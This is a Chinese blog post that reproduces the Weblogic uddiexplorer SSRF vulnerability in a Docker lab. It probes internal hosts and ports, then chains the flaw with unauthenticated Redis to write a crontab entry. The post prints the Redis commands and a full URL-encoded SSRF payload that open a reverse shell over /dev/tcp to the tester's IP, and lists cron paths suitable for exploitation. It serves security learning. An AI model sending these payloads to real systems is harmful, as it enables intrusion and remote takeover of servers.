Weblogic SSRF 漏洞复现

最新推荐文章于 2024-04-14 16:57:00 发布
置顶 最新推荐文章于 2024-04-14 16:57:00 发布
阅读量391 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: 网络安全 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45953122/article/details/132841297
版权

SSRF 实例

Weblogic SSRF 到GetShell

​ Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

测试环境搭建

编译及启动测试环境

sudo docker compose up -d

image-20230904190714192

访问http://10.9.75.58:7001/console :

image-20230904190849697

访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用:

image-20230904191122325

点击Search Public Registries ,并点击searh,进行抓包:

image-20230904191930922

我们猜测url这里存在ssrf漏洞,我们验证一下:

首先获取一个域名,这里获得的域名为:budkzl.dnslog.cn ,然后把该域名放到抓取的url中,为了便于确认,在前面写上123.

image-20230904192414625

查看是否能完成该DNS解析:

image-20230904192716273

我们看到这里有请求,说明我们这里输入的url地址,它会替我们发送url请求,说明这里存在ssrf漏洞

我们查看一下这个响应包:

image-20230904193400749

我们把url换成127.0.0.1,查看其响应:

image-20230904193622686

有响应,说明127.0.0.1这个地址是存活的,然后根据报错信息得出:通过HTTP不能连接服务器的80端口,所以80端口没有开放

我们找一个现在一定开放的端口(7001端口)试一下:

image-20230904194158378

状态码第一位数字决定了不同的响应状态,有如下:

  • 1 >> 开始发送请求 >> 消息
  • 2 >> 请求发送完成 >> 成功
  • 3 >> 开始读取响应 >> 重定向
  • 4 >> 读取响应结束 >> 请求错误
  • 5 表示服务器错误

常见服务器状态码
200:服务器响应正常,并正确返回。
304:该目标资源在上次请求后没有任何修改(通常用于浏览器的缓存机制,使用GET请求时尤其需要注意)。
400:无法找到请求的资源,可能原因:
(1) 语义有误,当前请求无法被服务器理解。
(2) 请求参数有误。
401:要访问的目标资源的权限不够,或者说当前请求需要用户验证;
403:没有权限访问资源。
404:找不到访问的对象,或者要访问的目标资源不存在。
405:要访问的目标资源被禁止。
414:请求的URL太长。
500:服务器内部代码错误。

还是不清楚了,那我们可以对比一下7002端口(没有开放):

image-20230904194736862

现在我们就可以对本机的ip做探测,目标一般开的是docker环境。

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),发现172.22.0.2:6379可以连通:

将172.22.0.2输入到url请求中:

image-20230904201320372

将172.21.0.1输入到url请求中:

image-20230904201107603

这时,我们已经知道了172.22.0.2这个IP地址是存活的,那么我们可以判断有哪些端口是开放的

检测3389 (远程桌面)端口:

image-20230904201553918

没有开放3389端口。

检测6379(redis数据库)端口:

image-20230904202347262

表示6379端口是开放的。并且没有回显

既然我们知道了redis数据库端口是开放的,我们也知道redis数据库存在未授权访问漏洞,我们可以利用其进行读写文件。

我们采用计划任务来获取反弹shell

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/10.9.75.58/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码:

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.58%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

&operator=http://172.22.0.2:6379/gehuii%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.58%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aagehui

成功反弹shell:

image-20230904204847421

补充:

​ 最后补充一下,可进行利用的cron有如下几个地方:

  • /etc/crontab 这个是肯定的
  • /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
  • /var/spool/cron/root centos系统下root用户的cron文件
    tab 这个是肯定的
  • /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
  • /var/spool/cron/root centos系统下root用户的cron文件
  • /var/spool/cron/crontabs/root debian系统下root用户的cron文件
g_h_i
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
Weblogic SSRF漏洞
cgjil的博客
09-16 326
【代码】Weblogic SSRF漏洞
Weblogic-SSRF漏洞复现
WY92139010的博客
05-23 172
Weblogic-SSRF漏洞复现 一、SSRF概念 服务端请求伪造(Server-Side Request Forgery),是一种有攻击者构造形成有服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,...
SSRF+Redis未授权getshell
最新发布
yuan_boss的博客
04-14 1065
当一个网站具有ssrf漏洞,如果没有一些过滤措施,比如没过滤file协议,gophere协议,dict等协议,就会导致无法访问的内网服务器信息泄露,甚至可以让攻击者拿下内网服务器权限。
实战getshell新姿势-SSRF漏洞利用与getshell实战
Peter 的博客
10-26 7555
实战getshell新姿势-SSRF漏洞利用与getshell实战一、什么地方最容易出现SSRF二、SSRF漏洞危害三、SSRF 神器 Curl 的使用四、最常用的跳转绕过五、Python + SSRF 实现端口扫描1. 简单的端口扫描2. 同时观察 Wireshark 整个扫描流程3. 代码实现4. 验证本地是否开启了相应的端口六、利用 Discuz 的 SSRF 漏洞 Getshell 一、什...
weblogic目录总结以及getshell
qq_45300786的博客
08-24 2096
之前都是工具一键getshell,没有仔细研究weblogic,这次手动payload的时候,遇到点问题,就稍微研究了一下。 发现访问目标是war包+文件名 http://192.168.100.80:7001/wls-wsat/test.jsp 但是上传的时候却是war包+随机生成的目录值+war+文件名 wls-wsat/54p17w/war/test.jsp 以下是楼主分析 结论一 结论二 ...
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
weblogic相关漏洞
05-03
WebLogic 相关漏洞概述 WebLogic 是 Oracle 公司出品的一款 Java EE 应用服务器,广泛应用于企业级应用系统中。然而,WebLogic 也存在一些漏洞,可能会被攻击者利用,导致严重的安全问题。以下是 WebLogic 相关漏洞...
K8 weblogic-CVE-2018-2628-getshell工具
07-13
K8 weblogic-CVE-2018-2628-getshell 渗透测试工具,内包含漏洞利用 图片、ip端口连接、shell控制。
cve-2018-2628 exp getshell
05-21
cve-2018-2628 exp getshell
SSRF02】服务器端请求伪造——WebLogic架构漏洞复现之从SSRF==>未授权访问==>GetShell
Fighting_hawk的博客
03-16 4015
1. 掌握SSRF漏洞挖掘的方法; 2. 掌握利用SSRF漏洞进行内网扫描; 3. 本实验中未涉及SSRF利用时绕过的方法; 4. 后续将研究如何成功反弹shell
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3289
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell(附带环境安装包)
利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell
wenqingshuo321的博客
10-11 744
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
SSRF漏洞基础讲解
m0_60571990的博客
12-07 1708
SSRF漏洞基础讲解
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值